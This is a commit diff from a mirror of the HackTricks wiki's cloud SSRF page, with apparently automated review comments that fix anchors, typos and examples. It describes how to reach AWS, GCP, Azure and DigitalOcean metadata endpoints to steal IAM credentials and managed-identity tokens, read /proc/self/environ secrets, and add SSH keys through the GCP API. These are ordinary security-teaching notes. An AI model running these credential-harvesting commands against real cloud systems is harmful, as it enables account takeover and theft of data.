mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
aa ssrf
parent
10c0f3e054
commit
21283c5644
@ -111,7 +111,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null |
> [!NOTE]
> Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.

### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a>
### SSRF for AWS Lambda

In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.

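Review bot: the `<a href="#id-6f97" id="id-6f97"></a>` anchor dropped from the Lambda heading is reused verbatim on the Elastic Beanstalk heading in the next hunk, so removing it is the right call (duplicate ids make in-page links ambiguous). The paragraph under the heading should also say that `file:///proc/self/environ` only works when the SSRF sink accepts the `file://` scheme, and that it returns the environment of the process performing the request, which is the Lambda process only when the vulnerable code runs inside it.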
@ -126,7 +126,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat
> [!WARNING]
> Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.

### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a>
### SSRF URL for AWS Elastic Beanstalk

We retrieve the `accountId` and `region` from the API.

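Review bot: "We retrieve the `accountId` and `region` from the API" does not say which API; the hunk headers around this section point at the instance metadata service, so name it, e.g. the instance identity document at `http://169.254.169.254/latest/dynamic/instance-identity/document`, which contains both fields. The `id-6f97` anchor removed here is the same duplicate as on the Lambda heading, fine to drop.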
@ -145,11 +145,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean

Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.

## GCP <a href="#id-6440" id="id-6440"></a>
## GCP

You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).

### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a>
### SSRF URL for Google Cloud

Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs:

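Review bot: `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/` hardcodes `us-east-2` although the previous step retrieves the region; use `[REGION]` there. "access the metadata endpoint in with the following URLs" has a stray "in". The GCP docs link goes to the App Engine (Java) page rather than the general Compute Engine metadata reference that the `computeMetadata/v1` URLs which follow belong to.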
@ -260,7 +260,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
> gcloud config unset auth/access_token_file
> ```

### Add an SSH key <a href="#id-3e24" id="id-3e24"></a>
### Add an SSH key

Extract the token

@ -289,7 +289,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
```

### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a>
### Cloud Functions

The metadata endpoint works the same as in VMs but without some endpoints:

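Review bot: the `setCommonInstanceMetadata` body `--data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'` is a placeholder that would not add an SSH key: the key must be `ssh-keys` and the value has the form `username:ssh-rsa AAAA... comment`. More importantly this call replaces the whole project-wide metadata, so sending only the new item drops every existing entry (other keys, startup scripts), and the API uses the `fingerprint` field for optimistic locking and rejects a request whose fingerprint is missing or stale; the text should say to GET `commonInstanceMetadata` first, append to `items`, and resend with the current `fingerprint`.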
@ -318,7 +318,7 @@ for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMeta
done
```

## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
## Digital Ocean

> [!WARNING]
> There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
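Review bot: the warning "There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials" is ungrammatical and "bot" looks like a typo; suggest "There is nothing like AWS roles or GCP service accounts, so don't expect to find credentials in the metadata". The `id-9f1f` anchor removed here was shared by the Cloud Functions and Digital Ocean headings, so dropping it also fixes a duplicate id.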
@ -337,7 +337,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
curl http://169.254.169.254/metadata/v1.json | jq
```

## Azure <a href="#cea8" id="cea8"></a>
## Azure

### Azure VM

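Review bot: the hunk's context line `.../interfaces/public/0/ipv6/addressAll in one request` shows that in the source file "All in one request" is glued onto the last URL of the Digital Ocean list, i.e. the blank line (or fence close) before the sentence introducing `curl http://169.254.169.254/metadata/v1.json | jq` is missing; add the line break while this section is being touched.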
@ -442,7 +442,7 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h
{{#endtab}}
{{#endtabs}}

### Azure App & Functions Services
### Azure App & Functions Services & Automation Accounts

From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server.

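Review bot: the context line `$userData = Invoke- RestMethod -Headers @{"Metadata"="true"} ...` has a space inside the cmdlet name, so that Azure VM example fails as written; it should be `Invoke-RestMethod`. In the renamed section, "That you can use to gather a token to speak with the metadata server" is a fragment and slightly wrong: `IDENTITY_ENDPOINT` is the local token service itself, and the token it returns is scoped to the `resource` you request (ARM, Graph, Key Vault, Storage), not to any metadata server; suggest "which you can use to request an access token for a given resource from the local identity endpoint".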
@ -519,57 +519,28 @@ $storageToken = Get-Token -Resource "https://storage.azure.com/"
Write-Host "Storage Token: $storageToken"


# Using oneliners

## Get management token
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token

## Get graph token
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://graph.microsoft.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token

## Get vault token
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://vault.azure.net/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token

## Get storage token
(Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token


# API request in powershell to management endpoint
$Token = 'eyJ0eX..'
$URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# API request to graph endpoint (get enterprise applications)
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# Using AzureAD Powershell module witho both management and graph tokens
$token = 'eyJ0e..'
$graphaccesstoken = 'eyJ0eX..'
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc

# Try to get current perms over resources
Get-AzResource
## The following error means that the user doesn't have permissions over any resource
Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
At line:1 char:1
+ Get-AzResource
+ ~~~~~~~~~~~~~~
+ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
+ FullyQualifiedErrorId :
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
## Remember that in Automation Accounts it might be declared the client ID of the assigned user managed identity inside the variable that can be gatehred with:
Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID'
```

{{#endtab}}
{{#endtabs}}

## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
## IBM Cloud

> [!WARNING]
> Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
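Review bot: the Automation Accounts comment added at the end of the block, "it might be declared the client ID of the assigned user managed identity inside the variable that can be gatehred with:", has a typo ("gatehred") and reads awkwardly; suggest "## In Automation Accounts the client ID of the assigned user-managed identity may be stored in an Automation variable, readable with:". For the lines around `Connect-AzAccount`, whichever side of the diff they stay on: "AzureAD Powershell module witho both" has a typo and the cmdlet belongs to the Az module, not AzureAD, and `-AccountId 2e91a4f12984-46ee-2736-e32ff2039abc` is not GUID-shaped (8-4-4-4-12); use an obviously fake value such as `00000000-0000-0000-0000-000000000000` so readers do not copy a malformed id.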